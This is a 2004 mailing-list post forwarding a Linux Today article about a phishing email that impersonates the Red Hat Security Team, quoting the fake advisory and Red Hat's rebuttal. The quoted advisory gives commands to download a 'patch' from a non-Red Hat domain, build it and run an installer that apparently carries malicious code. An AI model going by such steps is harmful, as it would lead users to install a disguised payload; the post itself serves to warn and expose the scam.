warning to list

AMAZING POWERS OF OBSERVATION m_epling at comcast.net
Mon Oct 25 02:43:40 UTC 2004 

ew Phishing Expedition Targets Red Hat/Fedora Users
Oct 25, 2004, 02 :30 UTC (0 Talkback[s]) (6 reads)
(Other stories by Brian Proffitt)
http://linuxtoday.com/security/2004102500826SCRHSW
By Brian Proffitt
Managing Editor

It's not often that someone tries launching a trojan attack on Linux
users, but earlier this weekend it appears that someone was trying to do
just that to Red Hat and Fedora Core users.

An e-mail message was sent to several Red Hat users over the weekend,
claiming to be from the RedHat [sic] Security Team. The note warned
recipients to download and install a patch for fileutils-1.0.6,
indicating that a vulnerability "could allow a remote attacker to
execute arbitrary code with root privileges." 

The note was seen in the wild earlier this weekend, but it is still
being delivered. This reporter received the message as late as 6:55 PM
EDT today. The message arrived five times, and were all delivered to my
work account, which is not the account I use to register products. 

The content of the note, complete with Red Hat logo, tries to tell a
good tale, as seen below, but the spelling errors and the improper From
address are clues of the note's false nature.

        "Original issue date: October 20, 2004
        
        "Last revised: October 20, 2004
        
        "Source: RedHat 
        
        "A complete revision history is at the end of this file. 
        
        "Dear RedHat user,
        
        "Redhat found a vulnerability in fileutils (ls and mkdir), that
        could allow a remote attacker to execute arbitrary code with
        root privileges. Some of the affected linux distributions
        include RedHat 7.2, RedHat 7.3, RedHat 8.0, RedHat 9.0, Fedora
        CORE 1, Fedora CORE 2 and not only. It is known that *BSD and
        Solaris platforms are NOT affected.
        
        "The RedHat Security Team strongly advises you to immediately
        apply the fileutils-1.0.6 patch. This is a critical-critical
        update that you must make by following these steps:
        
        
      * "First download the patch from the Security RedHat mirror: wget
        www.fedora-redhat.com/fileutils-1.0.6.patch.tar.gz
      * Untar the patch: tar zxvf fileutils-1.0.6.patch.tar.gz
      * cd fileutils-1.0.6.patch
      * make
      * ./inst
        
        "Again, please apply this patch as soon as possible or you risk
        your system and others` to be compromised.
        
        "Thank you for your prompt attention to this serious matter,
        
        RedHat Security Team..."
        

The domain fedora-redhat.com is part of a netblock owned by Yahoo,
according to Netcraft.com. It is not an official Red Hat site.

The security team at Red Hat has already noted the existence of the fake
warning, and has posted this message, dated October 23, at
http://www.redhat.com/security/:

        "Red Hat has been made aware that emails are circulating that
        pretend to come from the Red Hat Security Team. These emails
        tell users to download and run an update from a users home
        directory. This fake update appears to contain malicious code.
        Official messages from the Red Hat security team are never sent
        unsolicited, are always sent from the address
        secalert at redhat.com, and are digitally signed by GPG. All
        official updates for Red Hat products are digitally signed and
        should not be installed unless they are correctly signed and the
        signature is verified..."
        

Red Hat and Fedora Core users are urged not to download or install the
software highlighted in this ficticious message.

More information about the fedora-test-list mailing list